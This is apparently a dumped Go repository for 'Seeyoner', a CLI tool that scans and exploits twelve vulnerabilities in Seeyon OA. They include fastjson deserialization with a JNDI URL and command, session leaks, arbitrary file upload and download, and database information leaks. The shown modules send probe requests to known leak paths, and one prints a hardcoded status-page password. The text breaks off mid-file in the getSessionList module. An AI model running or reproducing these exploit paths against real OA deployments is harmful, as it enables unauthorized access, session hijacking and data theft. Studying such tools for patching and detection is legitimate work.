├── main.go ├── core ├── Seeyoner.go └── IFactory.go ├── .idea ├── .gitignore ├── vcs.xml ├── modules.xml └── seeyon-exploit-main.iml ├── go.mod ├── cmd ├── root.go ├── exploit.go ├── list.go └── scan.go ├── .github ├── workflows │ └── release.yml └── conf │ └── .goreleaser.yml ├── LICENSE ├── README.md ├── vulners ├── sy10.go ├── sy09.go ├── sy12.go ├── sy11.go ├── sy07.go ├── sy08.go ├── sy05.go ├── sy03.go ├── sy01.go ├── sy06.go ├── sy04.go └── sy02.go └── go.sum /main.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import "seeyonerExp/cmd" 4 | 5 | func main() { 6 | cmd.Execute() 7 | } 8 | -------------------------------------------------------------------------------- /core/Seeyoner.go: -------------------------------------------------------------------------------- 1 | package core 2 | 3 | type Seeyoner interface { 4 | Scan(url string) 5 | Exploit(url string) 6 | } 7 | -------------------------------------------------------------------------------- /.idea/.gitignore: -------------------------------------------------------------------------------- 1 | # 默认忽略的文件 2 | /shelf/ 3 | /workspace.xml 4 | # 基于编辑器的 HTTP 客户端请求 5 | /httpRequests/ 6 | # Datasource local storage ignored files 7 | /dataSources/ 8 | /dataSources.local.xml 9 | -------------------------------------------------------------------------------- /.idea/vcs.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /.idea/modules.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /.idea/seeyon-exploit-main.iml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 
-------------------------------------------------------------------------------- /go.mod: -------------------------------------------------------------------------------- 1 | module seeyonerExp 2 | 3 | go 1.19 4 | 5 | require ( 6 | github.com/fatih/color v1.13.0 7 | github.com/spf13/cobra v1.5.0 8 | ) 9 | 10 | require ( 11 | github.com/inconshreveable/mousetrap v1.0.0 // indirect 12 | github.com/mattn/go-colorable v0.1.9 // indirect 13 | github.com/mattn/go-isatty v0.0.14 // indirect 14 | github.com/spf13/pflag v1.0.5 // indirect 15 | golang.org/x/sys v0.0.0-20210630005230-0f9fa26af87c // indirect 16 | ) 17 | -------------------------------------------------------------------------------- /cmd/root.go: -------------------------------------------------------------------------------- 1 | package cmd 2 | 3 | import ( 4 | "os" 5 | 6 | "github.com/spf13/cobra" 7 | ) 8 | 9 | var ( 10 | url string 11 | vulnId int 12 | ) 13 | var rootCmd = &cobra.Command{ 14 | Use: "Seeyoner", 15 | Short: "Seeyoner", 16 | Long: `一个简单的致远OA安全测试工具,目的是为了协助漏洞自查、修复工作。`, 17 | } 18 | 19 | func Execute() { 20 | err := rootCmd.Execute() 21 | if err != nil { 22 | os.Exit(1) 23 | } 24 | } 25 | 26 | func init() { 27 | rootCmd.CompletionOptions.DisableDefaultCmd = true 28 | } 29 | -------------------------------------------------------------------------------- /cmd/exploit.go: -------------------------------------------------------------------------------- 1 | package cmd 2 | 3 | import ( 4 | "github.com/spf13/cobra" 5 | "seeyonerExp/core" 6 | ) 7 | 8 | var exploitCmd = &cobra.Command{ 9 | Use: "exploit", 10 | Short: "漏洞利用", 11 | Long: `漏洞利用模块 12 | 【fastjson】targetUrl:url|jndiUrl|command`, 13 | Run: func(cmd *cobra.Command, args []string) { 14 | factory := new(core.IFactory) 15 | iExploit := factory.NewFactory(vulnId) 16 | iExploit.Exploit(url) 17 | }, 18 | } 19 | 20 | func init() { 21 | rootCmd.AddCommand(exploitCmd) 22 | exploitCmd.Flags().StringVarP(&url, "targetUrl", "u", "", "targetUrl") 23 | 
exploitCmd.Flags().IntVarP(&vulnId, "vulnId", "i", 0, "vulnId") 24 | exploitCmd.MarkFlagRequired("targetUrl") 25 | exploitCmd.MarkFlagRequired("vulnId") 26 | } 27 | -------------------------------------------------------------------------------- /.github/workflows/release.yml: -------------------------------------------------------------------------------- 1 | name: goreleaser 2 | 3 | on: 4 | push: 5 | tags: 6 | - '*' 7 | 8 | permissions: 9 | contents: write 10 | 11 | jobs: 12 | goreleaser: 13 | runs-on: ubuntu-latest 14 | timeout-minutes: 60 15 | steps: 16 | - 17 | name: Checkout 18 | uses: actions/checkout@v3 19 | with: 20 | fetch-depth: 0 21 | - 22 | name: Go 1.20 23 | uses: actions/setup-go@v4 24 | with: 25 | go-version: "1.19" 26 | - 27 | name: Run GoReleaser 28 | uses: goreleaser/goreleaser-action@v3 29 | with: 30 | distribution: goreleaser 31 | version: latest 32 | args: -f .github/conf/.goreleaser.yml 33 | workdir: . 34 | env: 35 | GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} -------------------------------------------------------------------------------- /cmd/list.go: -------------------------------------------------------------------------------- 1 | package cmd 2 | 3 | import ( 4 | "fmt" 5 | "github.com/spf13/cobra" 6 | ) 7 | 8 | var ( 9 | VulnNames = []string{ 10 | //"log4j-RCE", 11 | "seeyon<8.0_fastjson反序列化", 12 | "thirdpartyController.do管理员session泄露", 13 | "webmail.do任意文件下载(CNVD-2020-62422)", 14 | "ajax.do未授权&任意文件上传", 15 | "getSessionList泄露Session", 16 | "htmlofficeservlet任意文件上传", 17 | "initDataAssess.jsp信息泄露", 18 | "DownExcelBeanServlet信息泄露", 19 | "createMysql.jsp数据库信息泄露", 20 | "test.jsp路径", 21 | "setextno.jsp路径", 22 | "status.jsp路径(状态监控页面)"} 23 | ) 24 | var listCmd = &cobra.Command{ 25 | Use: "list", 26 | Short: "列出所有漏洞信息", 27 | Long: `完整的漏洞列表及对应ID.`, 28 | Run: func(cmd *cobra.Command, args []string) { 29 | for i, v := range VulnNames { 30 | fmt.Printf("【%v】%v\n", i+1, v) 31 | } 32 | }, 33 | } 34 | 35 | func init() { 36 | rootCmd.AddCommand(listCmd) 
37 | } 38 | -------------------------------------------------------------------------------- /core/IFactory.go: -------------------------------------------------------------------------------- 1 | package core 2 | 3 | import ( 4 | "github.com/fatih/color" 5 | "os" 6 | "seeyonerExp/vulners" 7 | ) 8 | 9 | type IFactory struct { 10 | } 11 | 12 | func (i *IFactory) NewFactory(name int) Seeyoner { 13 | switch name { 14 | case 0: 15 | return nil 16 | case 1: 17 | return &vulners.Sy01{} 18 | case 2: 19 | return &vulners.Sy02{} 20 | case 3: 21 | return &vulners.Sy03{} 22 | case 4: 23 | return &vulners.Sy04{} 24 | case 5: 25 | return &vulners.Sy05{} 26 | case 6: 27 | return &vulners.Sy06{} 28 | case 7: 29 | return &vulners.Sy07{} 30 | case 8: 31 | return &vulners.Sy08{} 32 | case 9: 33 | return &vulners.Sy09{} 34 | case 10: 35 | return &vulners.Sy10{} 36 | case 11: 37 | return &vulners.Sy11{} 38 | case 12: 39 | return &vulners.Sy12{} 40 | default: 41 | color.Red("[x]不存在的漏洞编号!可使用list命令查看") 42 | os.Exit(1) 43 | return nil 44 | } 45 | } 46 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | The MIT License (MIT) 2 | 3 | Copyright © 2022 x51 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in 13 | all copies or substantial portions of the Software. 
14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN 21 | THE SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # seeyoner 2 | 致远OA漏洞利用工具 3 | 4 | ## Usage 5 | ``` 6 | PS C:\> seeyonerExp.exe -h 7 | 一个简单的致远OA安全测试工具,目的是为了协助漏洞自查、修复工作。 8 | 9 | Usage: 10 | Seeyoner [command] 11 | 12 | Available Commands: 13 | exploit 漏洞利用 14 | help Help about any command 15 | list 列出所有漏洞信息 16 | scan 漏洞检测 17 | 18 | Flags: 19 | -h, --help help for Seeyoner 20 | 21 | Use "Seeyoner [command] --help" for more information about a command. 
22 | ``` 23 | ### scan 24 | 全漏洞探测: 25 | ``` 26 | seeyonerExp.exe -u http://xxx.com -i 0 27 | ``` 28 | 29 | 指定漏洞探测: 30 | `-vn`指定漏洞编号,可通过`-show`参数查看: 31 | ``` 32 | D:\>seeyonerExp.exe list 33 | 34 | 漏洞列表: 35 | 1、seeyon<8.0_fastjson反序列化 36 | 2、thirdpartyController.do管理员session泄露 37 | 3、webmail.do任意文件下载(CNVD-2020-62422) 38 | 4、ajax.do未授权&任意文件上传 39 | 5、getSessionList泄露Session 40 | 6、htmlofficeservlet任意文件上传 41 | 7、initDataAssess.jsp信息泄露 42 | 8、DownExcelBeanServlet信息泄露 43 | 9、createMysql.jsp数据库信息泄露 44 | 10、test.jsp路径 45 | 11、setextno.jsp路径 46 | 12、status.jsp路径(状态监控页面) 47 | ``` 48 | 探测seeyon<8.0_fastjson反序列化漏洞: 49 | ``` 50 | seeyonerExp.exe scan -u http://xxx.com -i 1 51 | ``` 52 | 53 | ### run 54 | 55 | 以Session泄露+zip文件上传解压为例,指定编号为`2`: 56 | 57 | ``` 58 | seeyonerExp.exe exploit -u http://xxxx.com -i 2 59 | ``` 60 | 61 | -------------------------------------------------------------------------------- /cmd/scan.go: -------------------------------------------------------------------------------- 1 | package cmd 2 | 3 | import ( 4 | "github.com/spf13/cobra" 5 | "os" 6 | "seeyonerExp/core" 7 | "strconv" 8 | "sync" 9 | ) 10 | 11 | var wg sync.WaitGroup // 并发有序的组 12 | var mutex = &sync.Mutex{} 13 | 14 | var scanCmd = &cobra.Command{ 15 | Use: "scan", 16 | Short: "漏洞检测", 17 | Long: `漏洞检测功能 18 | `, 19 | Run: func(cmd *cobra.Command, args []string) { 20 | factory := new(core.IFactory) 21 | 22 | if vulnId == 0 { 23 | limiter := make(chan struct{}, 1) // 通过管道控制并发数 24 | arr := []string{"1", "2", "3", "4", "5", "6", "7", "8", "9", "10", "11", "12"} 25 | for _, pro := range arr { //并发应该处于一个循环之中 26 | wg.Add(1) 27 | limiter <- struct{}{} 28 | go func(pro string) { 29 | num, _ := strconv.Atoi(pro) 30 | iScan := factory.NewFactory(num) 31 | iScan.Scan(url) 32 | wg.Done() 33 | <-limiter 34 | }(pro) 35 | } 36 | wg.Wait() 37 | os.Exit(0) 38 | } 39 | iScan := factory.NewFactory(vulnId) 40 | iScan.Scan(url) 41 | }, 42 | } 43 | 44 | func init() { 45 | rootCmd.AddCommand(scanCmd) 46 | 47 | 
scanCmd.Flags().StringVarP(&url, "targetUrl", "u", "", "targetUrl") 48 | scanCmd.Flags().IntVarP(&vulnId, "vulnId", "i", 0, "vulnId") 49 | scanCmd.MarkFlagRequired("targetUrl") 50 | scanCmd.MarkFlagRequired("vulnId") 51 | } 52 | -------------------------------------------------------------------------------- /vulners/sy10.go: -------------------------------------------------------------------------------- 1 | package vulners 2 | 3 | import ( 4 | "github.com/fatih/color" 5 | "net/http" 6 | ) 7 | 8 | type Sy10 struct { 9 | } 10 | 11 | func (s *Sy10) Scan(targetUrl string) { 12 | scancorePayload := "/yyoa/common/js/menu/test.jsp" 13 | req, err := http.NewRequest("GET", targetUrl+scancorePayload, nil) 14 | if err != nil { 15 | color.Red("[x]请求异常!") 16 | } 17 | req.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36") 18 | resp, err := (&http.Client{}).Do(req) 19 | if err != nil { 20 | color.Red("[x]漏洞探测异常!") 21 | } 22 | defer resp.Body.Close() 23 | if resp.StatusCode == 200 { 24 | color.Green("[+]存在test.jsp路径") 25 | } else { 26 | color.White("[-]不存在test.jsp路径") 27 | } 28 | } 29 | func (s *Sy10) Exploit(targetUrl string) { 30 | scancorePayload := "/yyoa/common/js/menu/test.jsp" 31 | req, err := http.NewRequest("GET", targetUrl+scancorePayload, nil) 32 | if err != nil { 33 | color.Red("[x]漏洞探测异常!") 34 | } 35 | req.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36") 36 | resp, err := (&http.Client{}).Do(req) 37 | if err != nil { 38 | color.Red("[x]漏洞探测异常!") 39 | } 40 | defer resp.Body.Close() 41 | if resp.StatusCode == 200 { 42 | color.Green("[+]存在test.jsp路径") 43 | } else { 44 | color.White("[-]不存在test.jsp路径") 45 | } 46 | } 47 | -------------------------------------------------------------------------------- /vulners/sy09.go: 
-------------------------------------------------------------------------------- 1 | package vulners 2 | 3 | import ( 4 | "github.com/fatih/color" 5 | "net/http" 6 | ) 7 | 8 | type Sy09 struct { 9 | } 10 | 11 | func (s *Sy09) Scan(targetUrl string) { 12 | scancorePayload := "/yyoa/createMysql.jsp" 13 | req, err := http.NewRequest("GET", targetUrl+scancorePayload, nil) 14 | if err != nil { 15 | color.Red("[x]请求异常!") 16 | } 17 | req.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36") 18 | resp, err := (&http.Client{}).Do(req) 19 | if err != nil { 20 | color.Red("[x]漏洞探测异常!") 21 | } 22 | defer resp.Body.Close() 23 | if resp.StatusCode == 200 { 24 | color.Green("[+]存在createMysql.jsp数据库信息泄露") 25 | } else { 26 | color.White("[-]不存在createMysql.jsp数据库信息泄露") 27 | } 28 | } 29 | func (s *Sy09) Exploit(targetUrl string) { 30 | scancorePayload := "/yyoa/createMysql.jsp" 31 | req, err := http.NewRequest("GET", targetUrl+scancorePayload, nil) 32 | if err != nil { 33 | color.Red("[x]漏洞探测异常!") 34 | } 35 | req.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36") 36 | resp, err := (&http.Client{}).Do(req) 37 | if err != nil { 38 | color.Red("[x]漏洞探测异常!") 39 | } 40 | defer resp.Body.Close() 41 | if resp.StatusCode == 200 { 42 | color.Green("[+]存在createMysql.jsp数据库信息泄露") 43 | } else { 44 | color.White("[-]不存在createMysql.jsp数据库信息泄露") 45 | } 46 | } 47 | -------------------------------------------------------------------------------- /vulners/sy12.go: -------------------------------------------------------------------------------- 1 | package vulners 2 | 3 | import ( 4 | "github.com/fatih/color" 5 | "net/http" 6 | ) 7 | 8 | type Sy12 struct { 9 | } 10 | 11 | func (s *Sy12) Scan(targetUrl string) { 12 | scancorePayload := "/seeyon/management/status.jsp" 13 | req, err := http.NewRequest("GET", 
targetUrl+scancorePayload, nil) 14 | if err != nil { 15 | color.Red("[x]请求异常!") 16 | } 17 | req.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36") 18 | resp, err := (&http.Client{}).Do(req) 19 | if err != nil { 20 | color.Red("[x]漏洞探测异常!") 21 | } 22 | defer resp.Body.Close() 23 | if resp.StatusCode == 200 { 24 | color.Green("[+]存在status.jsp路径(密码:WLCCYBD@SEEYON)") 25 | } else { 26 | color.White("[-]不存在status.jsp路径") 27 | } 28 | } 29 | func (s *Sy12) Exploit(targetUrl string) { 30 | scancorePayload := "/seeyon/management/status.jsp" 31 | req, err := http.NewRequest("GET", targetUrl+scancorePayload, nil) 32 | if err != nil { 33 | color.Red("[x]漏洞探测异常!") 34 | } 35 | req.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36") 36 | resp, err := (&http.Client{}).Do(req) 37 | if err != nil { 38 | color.Red("[x]漏洞探测异常!") 39 | } 40 | defer resp.Body.Close() 41 | if resp.StatusCode == 200 { 42 | color.Green("[+]存在status.jsp路径(密码:WLCCYBD@SEEYON)") 43 | } else { 44 | color.White("[-]不存在status.jsp路径") 45 | } 46 | } 47 | -------------------------------------------------------------------------------- /vulners/sy11.go: -------------------------------------------------------------------------------- 1 | package vulners 2 | 3 | import ( 4 | "github.com/fatih/color" 5 | "net/http" 6 | ) 7 | 8 | type Sy11 struct { 9 | } 10 | 11 | func (s *Sy11) Scan(targetUrl string) { 12 | scancorePayload := "/yyoa/ext/trafaxserver/ExtnoManage/setextno.jsp" 13 | req, err := http.NewRequest("GET", targetUrl+scancorePayload, nil) 14 | if err != nil { 15 | color.Red("[x]请求异常!") 16 | } 17 | req.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36") 18 | resp, err := (&http.Client{}).Do(req) 19 | if err != nil { 20 | color.Red("[x]漏洞探测异常!") 
21 | } 22 | defer resp.Body.Close() 23 | if resp.StatusCode == 200 { 24 | color.Green("[+]存在setextno.jsp路径") 25 | } else { 26 | color.White("[-]不存在setextno.jsp路径") 27 | } 28 | } 29 | func (s *Sy11) Exploit(targetUrl string) { 30 | scancorePayload := "/yyoa/ext/trafaxserver/ExtnoManage/setextno.jsp" 31 | req, err := http.NewRequest("GET", targetUrl+scancorePayload, nil) 32 | if err != nil { 33 | color.Red("[x]漏洞探测异常!") 34 | } 35 | req.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36") 36 | resp, err := (&http.Client{}).Do(req) 37 | if err != nil { 38 | color.Red("[x]漏洞探测异常!") 39 | } 40 | defer resp.Body.Close() 41 | if resp.StatusCode == 200 { 42 | color.Green("[+]存在setextno.jsp路径") 43 | } else { 44 | color.White("[-]不存在setextno.jsp路径") 45 | } 46 | } 47 | -------------------------------------------------------------------------------- /vulners/sy07.go: -------------------------------------------------------------------------------- 1 | package vulners 2 | 3 | import ( 4 | "github.com/fatih/color" 5 | "net/http" 6 | ) 7 | 8 | type Sy07 struct { 9 | } 10 | 11 | func (s *Sy07) Scan(targetUrl string) { 12 | scancorePayload := "/yyoa/assess/js/initDataAssess.jsp" 13 | req, err := http.NewRequest("GET", targetUrl+scancorePayload, nil) 14 | if err != nil { 15 | color.Red("[x]请求异常!") 16 | } 17 | req.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36") 18 | resp, err := (&http.Client{}).Do(req) 19 | if err != nil { 20 | color.Red("[x]漏洞探测异常!") 21 | } 22 | defer resp.Body.Close() 23 | if resp.StatusCode == 200 { 24 | color.Green("[+]存在initDataAssess.jsp信息泄露") 25 | } else { 26 | color.White("[-]不存在initDataAssess.jsp信息泄露") 27 | } 28 | } 29 | func (s *Sy07) Exploit(targetUrl string) { 30 | scancorePayload := "/yyoa/assess/js/initDataAssess.jsp" 31 | req, err := http.NewRequest("GET", 
targetUrl+scancorePayload, nil) 32 | if err != nil { 33 | color.Red("[x]漏洞探测异常!") 34 | } 35 | req.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36") 36 | resp, err := (&http.Client{}).Do(req) 37 | if err != nil { 38 | color.Red("[x]漏洞探测异常!") 39 | } 40 | defer resp.Body.Close() 41 | if resp.StatusCode == 200 { 42 | color.Green("[+]存在initDataAssess.jsp信息泄露") 43 | } else { 44 | color.White("[-]不存在initDataAssess.jsp信息泄露") 45 | } 46 | } 47 | -------------------------------------------------------------------------------- /vulners/sy08.go: -------------------------------------------------------------------------------- 1 | package vulners 2 | 3 | import ( 4 | "github.com/fatih/color" 5 | "net/http" 6 | ) 7 | 8 | type Sy08 struct { 9 | } 10 | 11 | func (s *Sy08) Scan(targetUrl string) { 12 | scancorePayload := "/yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0" 13 | req, err := http.NewRequest("GET", targetUrl+scancorePayload, nil) 14 | if err != nil { 15 | color.Red("[x]请求异常!") 16 | } 17 | req.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36") 18 | resp, err := (&http.Client{}).Do(req) 19 | if err != nil { 20 | color.Red("[x]漏洞探测异常!") 21 | } 22 | defer resp.Body.Close() 23 | if resp.StatusCode == 200 { 24 | color.Green("[+]存在DownExcelBeanServlet信息泄露") 25 | } else { 26 | color.White("[-]不存在DownExcelBeanServlet信息泄露") 27 | } 28 | } 29 | func (s *Sy08) Exploit(targetUrl string) { 30 | scancorePayload := "/yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0" 31 | req, err := http.NewRequest("GET", targetUrl+scancorePayload, nil) 32 | if err != nil { 33 | color.Red("[x]漏洞探测异常!") 34 | } 35 | req.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36") 36 | 
resp, err := (&http.Client{}).Do(req) 37 | if err != nil { 38 | color.Red("[x]漏洞探测异常!") 39 | } 40 | defer resp.Body.Close() 41 | if resp.StatusCode == 200 { 42 | color.Green("[+]存在DownExcelBeanServlet信息泄露") 43 | } else { 44 | color.White("[-]不存在DownExcelBeanServlet信息泄露") 45 | } 46 | } 47 | -------------------------------------------------------------------------------- /.github/conf/.goreleaser.yml: -------------------------------------------------------------------------------- 1 | before: 2 | hooks: 3 | - sudo apt -y install libprotobuf-dev protobuf-compiler protoc-gen-go 4 | - go mod tidy 5 | - go generate ./... 6 | builds: 7 | - id: "with-upx" 8 | env: 9 | - CGO_ENABLED=0 10 | goos: 11 | - linux 12 | - windows 13 | - darwin 14 | goarch: 15 | - amd64 16 | - arm64 17 | - arm 18 | - "386" 19 | goarm: 20 | - "6" 21 | - "7" 22 | flags: 23 | - -trimpath 24 | ldflags: 25 | - -s -w -X main.version={{.Version}} -X main.commit={{.Commit}} -X main.date={{ .CommitDate }} -X main.builtBy=goreleaser 26 | ignore: 27 | - goos: windows 28 | goarch: arm64 29 | - goos: windows 30 | goarch: arm 31 | - goos: linux 32 | goarch: mips64 33 | hooks: 34 | post: upx --best -f -q "{{ .Path }}" 35 | 36 | # UnknownExecutableFormatException 37 | # CantPackException: can't pack new-exe 38 | - id: "without-upx" 39 | env: 40 | - CGO_ENABLED=0 41 | goos: 42 | - linux 43 | - windows 44 | - darwin 45 | goarch: 46 | - mips64 47 | - arm 48 | goarm: 49 | - "6" 50 | - "7" 51 | flags: 52 | - -trimpath 53 | ldflags: 54 | - -s -w -X main.version={{.Version}} -X main.commit={{.Commit}} -X main.date={{ .CommitDate }} -X main.builtBy=goreleaser 55 | ignore: 56 | - goos: linux 57 | goarch: arm 58 | 59 | 60 | archives: 61 | - format: zip 62 | name_template: '{{ .ProjectName }}_{{ .Os }}_{{ .Arch }}{{ if .Arm }}v{{ .Arm }}{{ end }}' 63 | checksum: 64 | name_template: 'checksums.txt' 65 | snapshot: 66 | name_template: "{{ incpatch .Version }}-next" 67 | changelog: 68 | sort: asc 69 | filters: 70 | exclude: 71 | 
- '^docs:' 72 | - '^test:' -------------------------------------------------------------------------------- /go.sum: -------------------------------------------------------------------------------- 1 | github.com/cpuguy83/go-md2man/v2 v2.0.2/go.mod h1:tgQtvFlXSQOSOSIRvRPT7W67SCa46tRHOmNcaadrF8o= 2 | github.com/fatih/color v1.13.0 h1:8LOYc1KYPPmyKMuN8QV2DNRWNbLo6LZ0iLs8+mlH53w= 3 | github.com/fatih/color v1.13.0/go.mod h1:kLAiJbzzSOZDVNGyDpeOxJ47H46qBXwg5ILebYFFOfk= 4 | github.com/inconshreveable/mousetrap v1.0.0 h1:Z8tu5sraLXCXIcARxBp/8cbvlwVa7Z1NHg9XEKhtSvM= 5 | github.com/inconshreveable/mousetrap v1.0.0/go.mod h1:PxqpIevigyE2G7u3NXJIT2ANytuPF1OarO4DADm73n8= 6 | github.com/mattn/go-colorable v0.1.9 h1:sqDoxXbdeALODt0DAeJCVp38ps9ZogZEAXjus69YV3U= 7 | github.com/mattn/go-colorable v0.1.9/go.mod h1:u6P/XSegPjTcexA+o6vUJrdnUu04hMope9wVRipJSqc= 8 | github.com/mattn/go-isatty v0.0.12/go.mod h1:cbi8OIDigv2wuxKPP5vlRcQ1OAZbq2CE4Kysco4FUpU= 9 | github.com/mattn/go-isatty v0.0.14 h1:yVuAays6BHfxijgZPzw+3Zlu5yQgKGP2/hcQbHb7S9Y= 10 | github.com/mattn/go-isatty v0.0.14/go.mod h1:7GGIvUiUoEMVVmxf/4nioHXj79iQHKdU27kJ6hsGG94= 11 | github.com/russross/blackfriday/v2 v2.1.0/go.mod h1:+Rmxgy9KzJVeS9/2gXHxylqXiyQDYRxCVz55jmeOWTM= 12 | github.com/spf13/cobra v1.5.0 h1:X+jTBEBqF0bHN+9cSMgmfuvv2VHJ9ezmFNf9Y/XstYU= 13 | github.com/spf13/cobra v1.5.0/go.mod h1:dWXEIy2H428czQCjInthrTRUg7yKbok+2Qi/yBIJoUM= 14 | github.com/spf13/pflag v1.0.5 h1:iy+VFUOCP1a+8yFto/drg2CJ5u0yRoB7fZw3DKv/JXA= 15 | github.com/spf13/pflag v1.0.5/go.mod h1:McXfInJRrz4CZXVZOBLb0bTZqETkiAhM9Iw0y3An2Bg= 16 | golang.org/x/sys v0.0.0-20200116001909-b77594299b42/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= 17 | golang.org/x/sys v0.0.0-20200223170610-d5e6a3e2c0ae/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= 18 | golang.org/x/sys v0.0.0-20210630005230-0f9fa26af87c h1:F1jZWGFhYfh0Ci55sIpILtKKK8p3i2/krTr0H1rg74I= 19 | golang.org/x/sys v0.0.0-20210630005230-0f9fa26af87c/go.mod 
h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= 20 | gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0= 21 | gopkg.in/yaml.v2 v2.4.0/go.mod h1:RDklbk79AGWmwhnvt/jBztapEOGDOx6ZbXqjP6csGnQ= 22 | -------------------------------------------------------------------------------- /vulners/sy05.go: -------------------------------------------------------------------------------- 1 | package vulners 2 | 3 | import ( 4 | "github.com/fatih/color" 5 | "io/ioutil" 6 | "net/http" 7 | ) 8 | 9 | type Sy05 struct { 10 | } 11 | 12 | func (s *Sy05) Scan(targetUrl string) { 13 | vulnerable, err := sy05scancore(targetUrl) 14 | if err != nil { 15 | color.Red("[x]请求异常!") 16 | return 17 | } 18 | if vulnerable { 19 | color.Green("[+]存在getSessionList泄露Session") 20 | } else { 21 | color.White("[-]不存在getSessionList泄露Session") 22 | } 23 | } 24 | 25 | func (*Sy05) Exploit(targetUrl string) { 26 | runResult, err := sy05runcore(targetUrl) 27 | if err != nil { 28 | color.Red("[x]漏洞利用异常!") 29 | return 30 | } 31 | if runResult != "" { 32 | color.White(runResult) 33 | } else { 34 | color.White("[!]无返回结果.") 35 | } 36 | } 37 | 38 | func sy05scancore(targetUrl string) (bool, error) { 39 | scancorePayload := "/yyoa/ext/https/getSessionList.jsp?cmd=getAll" 40 | req, err := http.NewRequest("GET", targetUrl+scancorePayload, nil) 41 | if err != nil { 42 | return false, err 43 | } 44 | req.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36") 45 | resp, err := (&http.Client{}).Do(req) 46 | if err != nil { 47 | return false, err 48 | } 49 | defer resp.Body.Close() 50 | if resp.StatusCode == 200 { 51 | return true, nil 52 | } else { 53 | return false, nil 54 | } 55 | } 56 | func sy05runcore(targetUrl string) (string, error) { 57 | runcorePayload := "/yyoa/ext/https/getSessionList.jsp?cmd=getAll" 58 | req, err := http.NewRequest("GET", targetUrl+runcorePayload, nil) 59 
